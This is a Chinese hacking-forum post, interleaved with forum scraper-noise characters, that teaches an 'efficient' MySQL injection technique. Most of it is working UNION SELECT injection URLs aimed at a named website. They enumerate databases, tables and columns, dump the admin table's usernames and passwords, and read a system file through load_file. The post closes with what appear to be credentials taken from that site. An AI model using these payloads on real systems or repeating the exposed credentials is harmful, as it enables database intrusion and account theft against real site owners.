找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 mysql注入高效方法
返回列表 发新帖
查看: 2625|回复: 0
打印 上一主题 下一主题

mysql注入高效方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 16:37:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
3 u6 |6 u; c1 u但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
+ t7 I" F8 \3 u; _* `4 M0 S( V1 I  \! G; c
1 ]. f/ n( p4 A( z
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
0 R- D3 D! D0 {2 `) W
7 r$ A, q" O1 {* i5 L% V, _/ p缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
" v2 Y+ f2 k4 \6 a# ]$ {
+ N" k& o$ c$ h下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示+ d' E) o7 c3 E/ _. ~" ^* r
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等/ W2 d2 ?6 v& v1 E
, ~; M1 n1 `# m6 x
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
! Y/ f: g# Q3 ^% [
* v9 `' [( n" P- C( o读出所有库:* H* z! u; c2 K* a$ J; \
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
; a4 O9 y$ ~  M- p
7 u, p6 i- N1 a! U: _. H( d$ ~7 T3 d

$ L1 L4 U  r* f. Y: @! Z读出所有表:' G. Q1 h' K$ s0 M3 U
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
! J, l  h( T0 B  b7 x- o8 [) c0 J0 A' \5 @; J
读出所有表字段:
0 ^6 }# r# P6 X( W( N3 Ohttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
  q/ S! z' ^9 d; v0 M*/ (97,100,109,105,110)为admin的ascii码 依次类推
: w) ]+ H" F- [# `% g
3 ]0 G8 n6 f& B# E5 W3 y; t6 L读出所有表字段里的内容:
4 s& ?5 [, H: Y7 L7 z, whttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
# w; r# B6 x; e6 k; F) P7 ~1 F, M0 U' z0 f4 W) W
* e+ I$ h5 j5 ]

5 z) ?( `' q$ s- Z# q* x# s" ^$ g6 z, Z- C2 b/ r7 y

- m3 p6 i. J- I2 j
( @, A7 K8 y$ j" lhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23, z2 P7 F0 k/ p# i5 Q) A' a5 @
" y7 \7 }% C3 {' j7 P' V% {
1 ^* h  c& X' C9 r0 U3 n5 N! F
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
; u$ o, s9 H7 ]* c9 b& |! A: {" c
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23% ~  B0 h- Q' C, l/ [) l' j

: y7 ^" b8 Q+ S+ C7 A
7 I1 B, l, q( l# rhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23" e$ W' i  q5 ~3 ^& f1 g: z8 T

0 d9 r- @: a# [6 P5 i5 ?, m2 |2 N& s
        webmaster:dzb521123,simlab:simadmin20043233
; c2 m( I- d7 Z+ m/ k6 V
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表